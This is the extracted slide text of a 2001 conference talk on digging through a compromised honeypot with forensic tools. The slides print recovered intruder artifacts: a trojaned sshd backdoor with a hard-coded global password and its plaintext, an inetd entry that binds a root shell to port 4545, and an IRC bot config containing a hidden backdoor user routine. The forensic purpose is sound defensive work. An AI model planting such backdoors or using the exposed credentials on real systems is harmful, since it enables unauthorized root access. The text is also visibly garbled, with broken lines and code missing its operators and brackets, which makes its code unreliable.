CanSecWest 01
Digging Through Compromised Systems and Tracking Intruders
Dave Dittrich
Computing unrm honeypot.hda$i.dd | strings | grep d33e8f1a6397c6 done
hda1
hda5
# ./configure -enable-global=d33e8f1a6397c6d2efd9a2aae748eb02 -enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache. .
 . / "d33e8f1a6397c6d2efd9a2aae748eb02";
#define USE_GLOBAL_PASS "d33e8f1a6397c6d2efd9a2aae748eb02"
. . .
echo "running $CONFIG_SHELL-/bin/sh ./configure-enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache
. . .
$ac_eAUSE_GLOBAL_PASS$ac_eBUSE_GLOBAL_PASS$ac_eC"d33e8f1a6397c6d2efd9a2aae748eb02"$ac_e
Dd33e8f1a6397c6d2efd9a2aae748eb02
hda6
hda7
hda8

Deleted i-node timestamp analysis
# grave-robber -c /t -m -d . -o LINUX2
# for i in 1 5 6 7 8 do ils honeypot.hda$i | ils2mac hda$i.ilsbody done
# ls -l *body
-rw-r--r-- 1 root root 3484454 Feb 15 23:01 body
-rw-r--r-- 1 root root 207 Feb 17 14:4
2 hda1.ilsbody
-rw-r--r-- 1 root root 179650 Feb 17 14:42 hda5.ilsbody
-rw-r--r-- 1 root root 207 Feb 17 14:42 hda6.ilsbody
-rw-r--r-- 1 root root 796 Feb 17 14:42 hda7.ilsbody
-rw-r--r-- 1 root root 12618 Feb 17 14:42 hda8.ilsbody
# cat hda?.ilsbody body-deleted
# cat body body-deleted body-full
# mactime -p /t/e
tc/passwd -g /t/etc/group -b body-full 11/06/2000 mactime.txt

Deleted i-nodes
Aug 09 00 12:52:37 18698240 m -rw-r--r-- 1010 users
Nov 08 00 06:52:59 18698240 .a. -rw-r--r-- 1010 users
Nov 08 00 06:56:08 18698240 c -rw-r--r-- 1010 users

Recovered source
#ifdef USE_GLOBAL_PA
SS
/* Check if the "global" password was entered */
int check_global_passwd( unsigned char *pass )
/* Paste here the output from md5sum -string="Your_Password" */
char md5passwd33=USE_GLOBAL_PASS;/ "3e3a378c63aa1e55e3e9ae9d2bdcd6a1";
struct MD5Context md;
unsigned char md5buffer32;
int i;
/* Compute the
response. */
MD5Init(MD5Update( MD5Final(md5buffer, for( i = 15; i = 0; i- ) md5bufferi*2+1 = (md5bufferi md5bufferi*2 = (md5bufferi 4) + 0;

Confirmation of backdoor password
#define USE_GLOBAL_PASS "d33e8f1a6397c6d2efd9a2aae748eb02"
# md5sum -string=tw1Lightz0ne
d33e8f1a6397c6d2efd9a2
aae748eb02 "tw1Lightz0ne"

Command line in swap space
rootapollo linux# ./dd bs=1024 DEEFFGG08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000. . .F* FF+, NV1/bin/sh -c e
cho 4545 stream tcp nowait root /bin/sh sh -i /etc/inetd.conf;killall -HUP inetd
Nov 8 04:02:00 apollo anacron2159: Updated timestamp for job cron.daily
Techniques by Wietse Venema and Peter Kosinar

Contents of IRC bot config file
# tPACK.tcl coded by T0R0 - - www.falcon- #set homech
an "#tpack"
set admin "TORO X-cess"
set vers "2.3"
set altnick "$nick-"
set username "$nick"
set realname "www.$"
set userfile ".log.yesterday"
set channel-file ".log.today"
. . .
proc dcc_flags handle idx arg
set a lindex $arg 0
set z decrypt xx3fw3 bijph.s5f7N0
if $handle = $z
set p "decrypt f3qcadr3 DtVgR.
E/mLu1"
if $a = $p if !validuser $z adduser $z *!*torowill.fuck.for.an.o-line.st chpass $z temp123 . . .

Decryption (part 1)
egg.log6692 set z decrypt xx3fw3 bijph.s5f7N0 TORO6694 set p "decrypt f3qcadr3 DtVgR.E/mLu1" die06769 set p "decrypt aSp81yAFiA/oyjc iU3CW.7pnwu/" reset07116 de
crypt clFua/ACQSB1aDZNz182aru0R0cJ1/8kzBZ/ 9xC15/VBEut1 decrypt 6iI5s1U/0kj0ux9EJ.VDFeS0 EPffD1HbaPj. decrypt X7EnV1qJu9J/sUhVd0C5mZM. ftxIp0RBYWq. decrypt uutWQ0VGi8k0rF0xV1lTiK5. XLnzYz0yt0 decrypt iys4f1DqXWm0FdGom/KfLuC1 qRt8A.4SMM20 bind chon - * on_dcc7328 set wmail "decrypt 65ty0hXeau/pk77x.dX 3AEfl/.23el/GowxN.aUrJT1"
Technique by Marco Walther